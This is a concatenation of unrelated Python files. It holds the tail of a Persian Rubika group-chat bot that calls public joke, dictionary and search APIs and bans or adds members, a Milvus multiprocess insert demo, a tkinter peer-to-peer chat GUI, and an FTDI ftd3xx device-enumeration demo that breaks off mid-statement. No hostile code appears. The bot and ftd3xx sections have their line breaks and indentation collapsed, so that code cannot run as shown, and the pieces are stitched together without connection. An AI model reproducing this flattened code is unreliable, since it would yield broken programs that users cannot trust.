print('code bz danesh err') return True def get_alaki_masala(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/alaki-masalan/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz alaki masala err') return True def name_shakh(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/name/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz name err') def get_vaj(text,chat,bot): try: vaj = text[6:-1] if hasInsult(vaj)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/vajehyab/?text=' + vaj).text) jd = jd['result'] text = 'معنی : \n'+jd['mani'] + '\n\n لغتنامه معین:\n' + jd['Fmoein'] + '\n\nلغتنامه دهخدا : \n' + jd['Fdehkhoda'] + '\n\nمترادف و متضاد : ' + jd['motaradefmotezad'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz vaj err') def get_font_fa(text,chat,bot): try: site = text[10:-1] jd = json.loads(requests.get('https://api.codebazan.ir/font/?type=fa&text=' + site).text) jd = jd['Result'] text = '' for i in range(1,10): text += jd[str(i)] + '\n' if hasInsult(site)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + site + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz font fa err') def get_leaved(text,chat,bot): try: send_text = 'بای بای 🖖' bot.sendMessage(chat['object_guid'], send_text, chat['last_message']['message_id']) except: print('rub server err') def get_added(text,chat,bot): try: group = chat['abs_object']['title'] send_text = 'سلام دوست عزیز به ' + group + ' خوش آمدی ❤ \n لطفا قوانین رو رعایت کن ✅' bot.sendMessage(chat['object_guid'], 
send_text, chat['last_message']['message_id']) except: print('rub server err') def get_help(text,chat,bot): text = open('help.txt','r').read() if chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) print('help guid sended') def usvl_save_data(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] f3 = len(open('farsi-dic.txt','rb').read()) if f3 < 83886080: f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1] f2 = [i.split('|=|')[0] for i in f2] if not txt_xt in f2: f2 = open('farsi-dic.txt','a') f2.write(txt_xt + '|=|' + text + '|/|\n') f2.close() else: bot.sendMessage(chat['object_guid'], '!usvl_stop') b2 = open('farsi-dic.txt','rb').read() tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=c_id) return True except: print('server rubika err') def usvl_test_data(text,chat,bot): try: f2 = open('farsi-dic.txt','r').read().split('|/|\n')[:-1] texts = [i.split('|=|')[0] for i in f2] replies = [i.split('|=|')[1] for i in f2] shebahat = 0.0 a = 0 shabih_tarin = None for text2 in texts: sh2 = similar(text, text2) if sh2 > shebahat: shebahat = sh2 shabih_tarin = a a += 1 print('shabih tarin: ' + str(shabih_tarin) , '|| darsad shebaht :' + str(shebahat)) if shabih_tarin != None: 
bot.sendMessage(chat['object_guid'], replies[shabih_tarin], chat['last_message']['message_id']) except: print('server rubika err') def get_backup(text,chat,bot): try: b2 = open('farsi-dic.txt','rb').read() tx = bot.requestFile('farsi-dic.txt', len(b2), 'txt') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendFile(chat['object_guid'] ,tx['id'] , 'txt', tx['dc_id'] , access, 'farsi-dic.txt', len(b2), message_id=chat['last_message']['message_id']) except: print('back err') g_usvl = '' test_usvl = False auth = "" bot = Bot(auth) list_message_seened = [] time_reset = random._floor(datetime.datetime.today().timestamp()) + 350 while(2 > 1): try: chats_list:list = bot.get_updates_all_chats() qrozAdmins = open('qrozAdmins.txt','r').read().split('\n') if chats_list != []: for chat in chats_list: access = chat['access'] if chat['abs_object']['type'] == 'User' or chat['abs_object']['type'] == 'Group': text:str = chat['last_message']['text'] print(chat) if 'SendMessages' in access and chat['last_message']['type'] == 'Text' and text.strip() != '': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: print('new message') if text == '!start': print('message geted and sinned') try: bot.sendMessage(chat['object_guid'], 'سلام \n به ابر سرویس کروز خوش آمدید ❤\n\n لطفا جهت راهنما \n!help \nرا ارسال کنید',chat['last_message']['message_id']) print('sended response') except: print('server bug1') elif text.startswith('!nim http://') == True or text.startswith('!nim https://') == True: try: bot.sendMessage(chat['object_guid'], "در حال آماده سازی لینک ...",chat['last_message']['message_id']) print('sended response') link = text[4:] nim_baha_link=requests.post("https://www.digitalbam.ir/DirectLinkDownloader/Download",params={'downloadUri':link}) pg:str = nim_baha_link.text pg = pg.split('{"fileUrl":"') pg = pg[1] pg = pg.split('","message":""}') pg = pg[0] nim_baha = pg try: 
bot.sendMessage(chat['object_guid'], 'لینک نیم بها شما با موفقیت آماده شد ✅ \n لینک : \n' + nim_baha ,chat['last_message']['message_id']) print('sended response') except: print('server bug2') except: print('server bug3') elif text.startswith('!info @'): tawd10 = Thread(target=info_qroz, args=(text, chat, bot,)) tawd10.start() elif text.startswith('!search ['): tawd11 = Thread(target=search, args=(text, chat, bot,)) tawd11.start() elif text.startswith('!wiki-s ['): try: search = text[9:-1] search = search + ' ویکی پدیا' if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'][0:4] text = '' for result in results: if ' - ویکی‌پدیا، دانشنامهٔ آزاد' in result['title']: title = result['title'].replace(' - ویکی‌پدیا، دانشنامهٔ آزاد','') text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n' bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'][0:4] text = '' for result in results: if ' - ویکی‌پدیا، دانشنامهٔ آزاد' in result['title']: title = result['title'].replace(' - ویکی‌پدیا، دانشنامهٔ آزاد','') text += title + ' :\n\n' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\nمقاله کامل صفحه 1 : \n' + '!wiki [1:' + title + ']\n\n' bot.sendMessage(chat['object_guid'], text , 
chat['last_message']['message_id']) except: print('wiki s err') elif text.startswith('!jok'): tawd9 = Thread(target=joker, args=(text, chat, bot,)) tawd9.start() elif text.startswith('!name_shakh'): tawd32 = Thread(target=name_shakh, args=(text, chat, bot,)) tawd32.start() elif text.startswith('!khatere'): tawd29 = Thread(target=get_khatere, args=(text, chat, bot,)) tawd29.start() elif text.startswith('!danesh'): tawd30 = Thread(target=get_danesh, args=(text, chat, bot,)) tawd30.start() elif text.startswith('!pa_na_pa'): tawd24 = Thread(target=get_pa_na_pa, args=(text, chat, bot,)) tawd24.start() elif text.startswith('!alaki_masala'): tawd31 = Thread(target=get_alaki_masala, args=(text, chat, bot,)) tawd31.start() elif text.startswith('!dastan'): tawd25 = Thread(target=get_dastan, args=(text, chat, bot,)) tawd25.start() elif text.startswith('!bio'): tawd27 = Thread(target=get_bio, args=(text, chat, bot,)) tawd27.start() elif text.startswith('!search-k ['): tawd26 = Thread(target=get_search_k, args=(text, chat, bot,)) tawd26.start() elif text.startswith('!ban [') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access: try: user = text[6:-1].replace('@', '') guid = bot.getInfoByUsername(user)["data"]["chat"]["abs_object"]["object_guid"] admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not guid in admins and chat['last_message']['author_object_guid'] in admins: bot.banGroupMember(chat['object_guid'], guid) bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id']) except: print('ban bug') elif text.startswith('!search-i ['): print('mpa started') tawd = Thread(target=search_i, args=(text, chat, bot,)) tawd.start() elif text.startswith('!remove') and chat['abs_object']['type'] == 'Group' and 'BanMember' in access: print('mpa started') tawd2 = Thread(target=uesr_remove, args=(text, chat, bot,)) tawd2.start() elif text.startswith('!trans ['): tawd28 = Thread(target=get_trans, 
args=(text, chat, bot,)) tawd28.start() elif text.startswith('!myket-s ['): try: search = text[10:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id']) jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text) jd = jd['search'] a = 0 text = '' for j in jd: if a <= 7: text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n' a += 1 else: break if text != '': bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://www.wirexteam.ga/myket?type=search&query=' + search).text) jd = jd['search'] a = 0 text = '' for j in jd: if a <= 7: text += '🔸 عنوان : ' + j['title_fa'] + '\nℹ️ توضیحات : '+ j['tagline'] + '\n🆔 نام یکتا برنامه : ' + j['package_name'] + '\n⭐️امتیاز: ' + str(j['rate']) + '\n✳ نام نسخه : ' + j['version'] + '\nقیمت : ' + j['price'] + '\nحجم : ' + j['size'] + '\nبرنامه نویس : ' + j['developer'] + '\n\n' a += 1 else: break if text != '': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('myket server err') elif text.startswith('!wiki ['): tawd23 = Thread(target=get_wiki, args=(text, chat, bot,)) tawd23.start() elif text.startswith('!currency'): print('mpa started') tawd15 = Thread(target=get_curruncy, args=(text, chat, bot,)) tawd15.start() elif text.startswith('!gold'): tawd22 = Thread(target=get_gold, args=(text, chat, bot,)) tawd22.start() elif text.startswith('!ping ['): tawd21 = Thread(target=get_ping, args=(text, chat, bot,)) tawd21.start() elif text.startswith('!font ['): 
tawd20 = Thread(target=get_font, args=(text, chat, bot,)) tawd20.start() elif text.startswith('!font-fa ['): tawd34 = Thread(target=get_font_fa, args=(text, chat, bot,)) tawd34.start() elif text.startswith('!whois ['): tawd19 = Thread(target=get_whois, args=(text, chat, bot,)) tawd19.start() elif text.startswith('!vaj ['): tawd33 = Thread(target=get_vaj, args=(text, chat, bot,)) tawd33.start() elif text.startswith('!weather ['): tawd18 = Thread(target=get_weather, args=(text, chat, bot,)) tawd18.start() elif text.startswith('!ip ['): tawd17 = Thread(target=get_ip, args=(text, chat, bot,)) tawd17.start() elif text.startswith("!add [") and chat['abs_object']['type'] == 'Group' and 'AddMember' in access: try: user = text[6:-1] bot.invite(chat['object_guid'], [bot.getInfoByUsername(user.replace('@', ''))["data"]["chat"]["object_guid"]]) bot.sendMessage(chat['object_guid'], 'اضافه شد' , chat['last_message']['message_id']) except: print('add not successd') elif text.startswith('!math ['): try: amal_and_value = text[7:-1] natije = '' if amal_and_value.count('*') == 1: value1 = float(amal_and_value.split('*')[0].strip()) value2 = float(amal_and_value.split('*')[1].strip()) natije = value1 * value2 elif amal_and_value.count('/') > 0: value1 = float(amal_and_value.split('/')[0].strip()) value2 = float(amal_and_value.split('/')[1].strip()) natije = value1 / value2 elif amal_and_value.count('+') > 0: value1 = float(amal_and_value.split('+')[0].strip()) value2 = float(amal_and_value.split('+')[1].strip()) natije = value1 + value2 elif amal_and_value.count('-') > 0: value1 = float(amal_and_value.split('-')[0].strip()) value2 = float(amal_and_value.split('-')[1].strip()) natije = value1 - value2 elif amal_and_value.count('**') > 0: value1 = float(amal_and_value.split('**')[0].strip()) value2 = float(amal_and_value.split('**')[1].strip()) natije = value1 ** value2 if natije != '': bot.sendMessage(chat['object_guid'], natije , chat['last_message']['message_id']) except: print('math 
err') elif text.startswith('!shot'): tawd16 = Thread(target=shot_image, args=(text, chat, bot,)) tawd16.start() elif text.startswith('!speak'): print('mpa started') tawd6 = Thread(target=speak_after, args=(text, chat, bot,)) tawd6.start() elif text.startswith('!p_danesh'): tawd12 = Thread(target=p_danesh, args=(text, chat, bot,)) tawd12.start() elif text.startswith('!write ['): print('mpa started') tawd5 = Thread(target=write_image, args=(text, chat, bot,)) tawd5.start() elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True: tawd13 = Thread(target=anti_insult, args=(text, chat, bot,)) tawd13.start() elif chat['abs_object']['type'] == 'Group' and 'DeleteGlobalAllMessages' in access and hasAds(text) == True: tawd14 = Thread(target=anti_tabligh, args=(text, chat, bot,)) tawd14.start() elif text.startswith('!help'): tawd38 = Thread(target=get_help, args=(text, chat, bot,)) tawd38.start() elif text.startswith('!usvl_start') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '': g_usvl = chat['object_guid'] bot.sendMessage(chat['object_guid'], 'usvl is started', chat['last_message']['message_id']) elif text.startswith('!usvl_stop') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl != '': g_usvl = '' bot.sendMessage(chat['object_guid'], 'usvl is stopped', chat['last_message']['message_id']) elif text.startswith('!usvl_test') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and g_usvl == '' and test_usvl == False: test_usvl = True bot.sendMessage(chat['object_guid'], 'test usvl is started', chat['last_message']['message_id']) elif text.startswith('!usvl_untest') and chat['abs_object']['type'] == 'Group' and chat['last_message']['author_object_guid'] in qrozAdmins and test_usvl == True: test_usvl = False 
bot.sendMessage(chat['object_guid'], 'test usvl is stopped', chat['last_message']['message_id']) elif text.startswith('!backup') and chat['object_guid'] in qrozAdmins: tawd44 = Thread(target=get_backup, args=(text, chat, bot,)) tawd44.start() elif chat['object_guid'] == g_usvl and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group': tawd42 = Thread(target=usvl_save_data, args=(text, chat, bot,)) tawd42.start() elif test_usvl == True and chat['last_message']['author_object_guid'] != 'u0DHSrv0bd39028f37e44305e207e38a' and chat['abs_object']['type'] == 'Group': print('usvl tested') tawd43 = Thread(target=usvl_test_data, args=(text, chat, bot,)) tawd43.start() list_message_seened.append(m_id) elif 'SendMessages' in access and chat['last_message']['type'] == 'Other' and text.strip() != '' and chat['abs_object']['type'] == 'Group' and chat['abs_object']['type'] == 'Group': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: if text == 'یک عضو گروه را ترک کرد.': tawd35 = Thread(target=get_leaved, args=(text, chat, bot,)) tawd35.start() elif text == '1 عضو جدید به گروه افزوده شد.' 
or text == 'یک عضو از طریق لینک به گروه افزوده شد.': tawd36 = Thread(target=get_added, args=(text, chat, bot,)) tawd36.start() list_message_seened.append(m_id) elif 'SendMessages' in access and text.strip() != '' and chat['abs_object']['type'] == 'Group': text = text.strip() m_id = chat['object_guid'] + chat['last_message']['message_id'] if not m_id in list_message_seened: if 'DeleteGlobalAllMessages' in access and hasInsult(text)[0] == True: tawd39 = Thread(target=anti_insult, args=(text, chat, bot,)) tawd39.start() list_message_seened.append(m_id) elif 'DeleteGlobalAllMessages' in access and hasAds(text) == True: tawd40 = Thread(target=anti_tabligh, args=(text, chat, bot,)) tawd40.start() list_message_seened.append(m_id) else: print('no update ') except: print('qroz err koli') time_reset2 = random._floor(datetime.datetime.today().timestamp()) if list_message_seened != [] and time_reset2 > time_reset: list_message_seened = [] time_reset = random._floor(datetime.datetime.today().timestamp()) + 350
# ===== multiprocess_example.py =====
## This program demos how to use the milvus python client with multi-process.
import os
from multiprocessing import Process

from factorys import *  # NOTE(review): wildcard import — presumably supplies `time`, `random`, `MetricType`; verify
from milvus import Milvus

############### Global variable ###########
collection_name = 'test_test'

# Collection schema used for the whole demo.
param = {'collection_name': collection_name, 'dimension': 128,
         'index_file_size': 1024, 'metric_type': MetricType.L2}

server_config = {
    'host': "127.0.0.1",
    'port': "19530"
}


## Utils
def _generate_vectors(_dim, _num):
    """Return `_num` random float vectors, each of dimension `_dim`."""
    return [[random.random() for _ in range(_dim)] for _ in range(_num)]


def prepare_collection(_collection_name):
    """Drop `_collection_name` if it already exists, then recreate it.

    The work is done in a child process: an exception would be raised if
    `_create_collection` ran in the main process.
    """
    def _create_collection(_collection_param):
        milvus = Milvus()
        milvus.connect(**server_config)
        status, ok = milvus.has_collection(_collection_name)
        if ok:
            print("Table {} found, now going to delete it".format(_collection_name))
            status = milvus.drop_collection(_collection_name)
            if not status.OK():
                raise Exception("Delete collection error")
            print("delete collection {} successfully!".format(_collection_name))
            # Give the server a moment to finish the drop before re-checking.
            time.sleep(5)
        status, ok = milvus.has_collection(_collection_name)
        if ok:
            raise Exception("Delete collection error")
        # Fix: create from the argument instead of silently reading the
        # global `param` (the argument was previously ignored).
        status = milvus.create_collection(_collection_param)
        if not status.OK():
            print("Create collection {} failed".format(_collection_name))
        milvus.disconnect()

    p = Process(target=_create_collection, args=(param,))
    p.start()
    p.join()


def multi_insert(_collection_name):
    """Insert 10000 random vectors from each of 10 concurrent processes."""
    # Holds every spawned subprocess so we can join them all.
    process_list = []

    def _add():
        milvus = Milvus()
        status = milvus.connect(**server_config)
        vectors = _generate_vectors(128, 10000)
        print('\n\tPID: {}, insert {} vectors'.format(os.getpid(), 10000))
        status, _ = milvus.add_vectors(_collection_name, vectors)
        milvus.disconnect()

    for i in range(10):
        p = Process(target=_add)
        process_list.append(p)
        p.start()

    # Block the main process until every subprocess exits.
    for p in process_list:
        p.join()

    print("insert vector successfully!")


def validate_insert(_collection_name):
    """Assert that exactly 10 * 10000 vectors ended up in the collection."""
    milvus = Milvus()
    milvus.connect(**server_config)
    status, count = milvus.count_collection(_collection_name)
    assert count == 10 * 10000, "Insert validate fail. Vectors num is not matched."
    milvus.disconnect()


def main(_collection_name):
    """Full demo: recreate the collection, insert in parallel, validate."""
    prepare_collection(_collection_name)

    # Use multiple processes to insert data.
    multi_insert(_collection_name)

    # Sleep 3 seconds to wait for the inserted vectors to be persisted.
    time.sleep(3)

    validate_insert(_collection_name)


if __name__ == '__main__':
    main(collection_name)
# ===== demo_gui.py =====
import threading
import time

# GUI modules
from tkinter import *
from tkinter.font import *

# internal module
from p2pchat import *

__version__ = "0.1-beta"


def rgb2hex(r, g, b):
    """Format an (r, g, b) triple as a '#rrggbb' hex colour string."""
    return f'#{r:02x}{g:02x}{b:02x}'


def window_create_connection(event=None):
    """Pop up a small dialog that lets the user connect to a peer by IP."""

    def submitConnection(event=None):
        # Read the address, try to connect, report the result, then close.
        client = addrclient_input_entry.get()
        addrclient_input_entry.unbind("<Return>")
        state.set("Connecting...")
        addrclient_input_state.update()
        if _send.create_connection(client) == True:
            addrclient_input_state.config(fg="Spring Green")
            state.set("Connect to {} successfully!".format(client))
        else:
            addrclient_input_state.config(fg="Red")
            state.set("Connect to {} failed!".format(client))
        addrclient_input_state.update()
        # Leave the status visible for a second before closing the dialog.
        time.sleep(1)
        win_conn.destroy()
        win_conn.update()

    # Dialog geometry
    w_win_conn = 270
    h_win_conn = 50

    # Window container
    win_conn = Toplevel()
    win_conn.title("Create connection")
    win_conn.config(bg=theme_color, width=w_win_conn, height=h_win_conn)
    win_conn.minsize(w_win_conn, h_win_conn)
    win_conn.resizable(False, False)

    # Connection input row
    conn_frame = LabelFrame(win_conn, text="Connection")
    conn_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_conn)
    conn_frame.pack(fill="both", expand=True)

    addrclient_input_label = Label(conn_frame, text="Create Connections")
    addrclient_input_label.config(bg=theme_color, fg=font_color, font=font)
    addrclient_input_label.pack(side="left")

    addrclient_input_entry = Entry(conn_frame)
    addrclient_input_entry.config(bg=theme_color, fg=font_color,
                                  insertbackground=font_color, font=font, width=17)
    addrclient_input_entry.focus_set()
    addrclient_input_entry.bind("<Return>", submitConnection)
    addrclient_input_entry.pack(side="right", padx=5, pady=5)

    # Connection status row
    state_frame = LabelFrame(win_conn, text="Status")
    state_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_conn)
    state_frame.pack(fill="both", expand=True)

    state = StringVar()
    state.set("Insert IP Address")
    addrclient_input_state = Label(state_frame, textvariable=state)
    addrclient_input_state.config(bg=theme_color, fg=font_color, justify=CENTER, font=font)
    addrclient_input_state.pack()
    return


def printRecvMessage():
    """Background loop: pull incoming messages and append them to the chat box."""
    _recv.listen()
    while True:
        # Get the next message from the receive stream (may be None).
        _message = _recv.recv_msg()

        # Append it to the (normally read-only) content box.
        if _message != None:
            mess_content_box.config(state=NORMAL)
            mess_content_box.insert(INSERT, _message + "\n")
            mess_content_box.config(state=DISABLED)
            mess_content_box.see(END)

        # If the peer connected to us first, open our outgoing connection back.
        if _recv.client_addr != None and _send.client_addr == None:
            _send.create_connection(_recv.client_addr[0])


def printSendMessage(event=None):
    """Send the text in the input box to the peer and echo it locally."""

    def formatString(msg):
        # Collapse runs of spaces/tabs, then strip trailing whitespace.
        collected = []
        wordlist = (' ', '\t')

        def toString(arr):
            return "".join(arr)

        for i in range(1, len(msg)):
            if i == len(msg) - 1 and msg[i] in wordlist:
                break
            if msg[i] == msg[i - 1] and msg[i] in wordlist:
                continue
            collected.append(msg[i - 1])
        msg = toString(collected)

        wordlist = (' ', '\t', '\n')
        for i in range(1, len(msg)):
            if msg[-i] in wordlist:
                continue
            if i == 1:
                return msg
            msg = msg[0:-i]
            break
        return msg

    # Take the message out of the input box and clear it.
    _message = formatString(str(mess_input_box.get("1.0", END)))
    mess_input_box.delete("1.0", END)

    # Send it and echo it into the content box.
    if not _message == "":
        _send.send_msg(_message)
        mess_content_box.config(state=NORMAL)
        mess_content_box.insert(INSERT, "{}: {}".format(_send.host_user, _message + "\n"))
        mess_content_box.config(state=DISABLED)
        mess_content_box.see(END)

    return "break"  # Prevent tkinter from inserting a newline itself


def createShortcutKey():
    """Bind the global keyboard shortcuts on the main window."""
    mainWindow.bind("<Control-n>", window_create_connection)
    mainWindow.bind("<Control-q>", lambda e: mainWindow.quit())


def createMenu():
    """Build the menu bar (Preference and Help menus)."""

    def show_About():
        # Small "About" dialog with author and version.
        w_win_about = 215
        h_win_about = 40

        win_about = Toplevel(mainWindow)
        win_about.title("About")
        win_about.config(bg=theme_color)
        win_about.minsize(w_win_about, h_win_about)
        win_about.resizable(False, False)

        author_frame = LabelFrame(win_about, text="Author")
        author_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_about)
        author_frame.pack(fill="both", expand=True)
        author = Label(author_frame, text="n3r0")
        author.config(bg=theme_color, fg=font_color, font=font)
        author.pack()

        ver_frame = LabelFrame(win_about, text="Version")
        ver_frame.config(bg=theme_color, fg=font_color, font=font, width=w_win_about)
        ver_frame.pack(fill="both", expand=True)
        ver = Label(ver_frame, text=__version__)
        ver.config(bg=theme_color, fg=font_color, font=font)
        ver.pack()

    # Menu bar container
    menubar = Menu(mainWindow)

    # Preference menu
    prefmenu = Menu(menubar, tearoff=0)
    prefmenu.add_command(label="New Connect Ctrl+N", command=window_create_connection)
    prefmenu.add_separator()
    prefmenu.add_command(label="Quit Ctrl+Q", command=mainWindow.quit)

    # Help menu
    helpmenu = Menu(menubar, tearoff=0)
    helpmenu.add_command(label="About", command=show_About)

    # Attach child menus to the bar and install it.
    menubar.add_cascade(label="Preference", menu=prefmenu)
    menubar.add_cascade(label="Help", menu=helpmenu)
    mainWindow.config(menu=menubar)


def createMainLayout():
    """Build the main layout: chat content box on top, input box below."""

    def insertNewline(event=None):
        # Shift+Return: fall through to tkinter's default newline insertion.
        return

    # Container frame
    mainLayout = Frame(mainWindow)
    mainLayout.pack(fill="both", expand=True)

    # Content box (read-only chat history); height is in lines, not pixels.
    h_mess_content_box = 20
    global mess_content_box
    mess_content_box = Text(mainLayout, width=w_mainWindow, height=h_mess_content_box)
    # mess_content_box = Text(mainWindow, width=w_mainWindow, height=h_mess_content_box)
    mess_content_box.config(state=DISABLED, bg=theme_color, fg=font_color, font=font)
    mess_content_box.pack(side=TOP)

    # Input box; height is in lines, not pixels.
    h_mess_input_box = 2
    global mess_input_box
    mess_input_box = Text(mainLayout, width=w_mainWindow, height=h_mess_input_box)
    # mess_input_box = Text(mainWindow, width=w_mainWindow, height=h_mess_input_box)
    mess_input_box.config(bg=theme_color, fg=font_color, insertbackground=font_color, font=font)
    mess_input_box.focus_set()
    mess_input_box.bind("<Return>", printSendMessage)
    mess_input_box.bind("<Shift-Return>", insertNewline)
    mess_input_box.pack(side=BOTTOM)


try:
    # Networking sessions (from p2pchat).
    _send = send_session()
    _recv = recv_session()

    mainWindow = Tk()

    # Global appearance settings
    w_mainWindow = "660"
    h_mainWindow = "360"
    theme_color = "#0e1621"
    font_color = "white"
    font = Font(family="sans-serif", size=10)

    # Main window setup
    mainWindow.resizable(False, False)
    mainWindow.title("P2PChatBox")
    mainWindow.geometry("{}x{}".format(w_mainWindow, h_mainWindow))

    # Build the UI
    createShortcutKey()
    createMenu()
    createMainLayout()

    # Receive messages on a daemon thread so the GUI loop stays responsive.
    th = threading.Thread(target=printRecvMessage, daemon=True)
    th.start()

    mainWindow.mainloop()
except Exception as e:
    print(e)
# ===== apiusage.py =====
import ftd3xx import sys if sys.platform == 'win32': import ftd3xx._ftd3xx_win32 as _ft elif sys.platform == 'linux': import ftd3xx._ftd3xx_linux as _ft import datetime import time import binascii import itertools import ctypes import threading import logging import os import platform import random import string import struct def DemoGetNumDevicesConnected(): DEVICES = ftd3xx.listDevices() return len(DEVICES) if DEVICES is not None else 0 def DemoWaitForDeviceReenumeration(): # should be called when setChipConfiguration, cycleDevicePort or resetDevicePort is called # todo: get optimal sleep times origValue = ftd3xx.raiseExceptionOnError(False) time.sleep(1) while (ftd3xx.listDevices() == None): time.sleep(1) time.sleep(1) ftd3xx.raiseExceptionOnError(origValue) if sys.platform == 'linux': count = 0 while count == 0: count = ftd3xx.createDeviceInfoList() def DemoTurnOffPipeThreads(): # Call before FT_Create when non-transfer functions will be called # Only needed for RevA chip (Firmware 1.0.2) # Not necessary starting RevB chip (Firmware 1.0.9) if sys.platform == 'linux': conf = _ft.FT_TRANSFER_CONF(); conf.wStructSize = ctypes.sizeof(_ft.FT_TRANSFER_CONF); conf.pipe[_ft.FT_PIPE_DIR_IN].fPipeNotUsed = True; conf.pipe[_ft.FT_PIPE_DIR_OUT].fPipeNotUsed = True; conf.pipe.fReserved = False; conf.pipe.fKeepDeviceSideBufferAfterReopen = False; for i in range(4): ftd3xx.setTransferParams(conf, i); return True def DemoEnumerateDevices(): numDevices = ftd3xx.createDeviceInfoList() if (numDevices == 0): return False # list devices by listDevices(description) logging.debug("List devices by listDevices(description)") DEVICES = ftd3xx.listDevices(_ft.FT_OPEN_BY_DESCRIPTION) if (DEVICES is None): return False logging.debug("Device count = %d" % len(DEVICES)) for i in range(len(DEVICES)): logging.debug("DEVICE[%d] = %s" % (i, DEVICES[i].decode('utf-8'))) DEVICES = 0 logging.debug("") # list devices by listDevices(serial number) logging.debug("List devices by listDevices(serial 
number)") DEVICES = ftd3xx.listDevices(_ft.FT_OPEN_BY_SERIAL_NUMBER) if (DEVICES is None): return False logging.debug("Device count = %d" % len(DEVICES)) for i in range(len(DEVICES)): logging.debug("DEVICE[%d] = %s" % (i, DEVICES[i].decode('utf-8'))) DEVICES = 0 logging.debug("") # list devices by getDeviceInfoList() logging.debug("List devices by getDeviceInfoList()") logging.debug("Device count = %d" % numDevices) DEVICELIST = ftd3xx.getDeviceInfoList() for i in range(numDevices): logging.debug("DEVICE[%d]" % i) logging.debug("\tFlags = %d" % DEVICELIST[i].Flags) logging.debug("\tType = %d" % DEVICELIST[i].Type) logging.debug("\tID = %#010X" % DEVICELIST[i].ID) logging.debug("\tLocId = %d" % DEVICELIST[i].LocId) logging.debug("\tSerialNumber = %s" % DEVICELIST[i].SerialNumber.decode('utf-8')) logging.debug("\tDescription = %s" % DEVICELIST[i].Description.decode('utf-8')) DEVICELIST = 0 logging.debug("") # list devices by getDeviceInfoDetail() logging.debug("List devices by getDeviceInfoDetail()") logging.debug("Device count = %d" % numDevices) for i in range(numDevices): DEVICE = ftd3xx.getDeviceInfoDetail(i) logging.debug("DEVICE[%d]" % i) logging.debug("\tFlags = %d" % DEVICE['Flags']) logging.debug("\tType = %d" % DEVICE['Type']) logging.debug("\tID = 